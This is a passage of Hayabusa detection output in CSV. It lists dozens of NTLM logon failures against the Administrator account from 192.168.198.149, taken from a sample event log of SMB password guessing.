+09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u3k7dXu9o1vMkhby : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EDBt76dmYnPstFWw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:00.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4yjzMC7cw0fe7gjS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eQOWCM7KP68DZTX9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kn9WWWqCIwfrPbie : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AQcamLSzsXOjP6FL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.278 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6R6ZMRoYkAPB35Bq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ubqnZm0jmHNFCHrM : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7ORQ8vL1oo6CkJXK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rDPl1SSddrWEs979 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VrK7fENAr1lxFr9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.633 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wu4djhEVSMYBOmjF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7e0NOdXhEkW6MskA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:00.715 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7nqxLHaOtkHHNAa1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NCrCf73NtEpk5DUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YVFm1epksVGO1nFY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YmVehuMHvh5kVqRW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sERZrNUHsKVEShCb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eaSNgw2hvkxLnQF8 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FSYOWptgxHYTDv1x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Van1qwuRoWYPWrIY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TyLCa9OHocazZKQ2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XxrR5iUsTI9LVnLL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TxMREacN0QfvL51B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:01.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7fbzSHaZBDH4zFZZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NgIei0bMIcslJCVa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JPoKjwanczELBC5A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QOYMVAnCWB2RFYAk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k1S45GBtQ8Uoyilw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.378 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 60oeDAnU41sz1wYg : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: enjlrrdf6lrm7Bao : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 58WzO6wxh7QshZgS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7eZKzHgu5ADLYsWU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uOSK3xC1E5PpBVNM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.598 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vFXasYWGCHbQOWWI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:01.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4XlYJ3oHYKYhg0KC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.691 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LxOKwi8Q4y2mHBDu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xwFKFySH4w2yWtPX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OlwGTGadOEMfUFiM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hZ9WuMoOtxGdwOQn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cCLK0gWvRoz0Ceao : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZDrcOxtm2fHXK5pO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pm2tPGetcAJkSuvK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FBskiUSfF2ghuDcF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZJal2nq3JAk6I2S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y9ek0Sl1ikhIfIb6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:02.141 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eHrn5Tp9JtnAgCbE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k7tR8gp2piqqixqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SqSBRMoiFeWe4FAt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nu4m1xKDU0OUkoR0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.354 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gui98cdQHPgyNOZI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bm4U7TAfsPTEiygC : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fDOoaVWVFAMLiA71 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qiJeLgInEkHffefo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yWyguWQP2iYUArhD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.595 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vDa3GqsTMMXguFhi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lr0lkAcdnji1zjW4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:02.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4WfNFd5MkQxaxHGP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j8hdPhtxP4Ds65yV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y2BBoWoXWXuRysTx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6GEhZ2BduHwjJj9H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GbwEHQCAUJd64LlA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wGfoObbN8ioefyce : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iLHhCgHvmOzoLLqG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v9KL69y47DMyFOWT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.098 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ECuVYiqdMw2dMjT6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YJCYumRekD7AREYQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0H4OxKzoemZrsosT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:03.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wSHnvxa0khWdWBVx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bJkPp0bghDCPYz52 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SfHRWGXjCej9HSPb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.383 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X42H7EvrvzsRqXWO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: moo42NdOq30Gnz3T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A4NHVYxxDkCOsQw8 : IP Address: 192.168.198.149 : AuthPackage: 
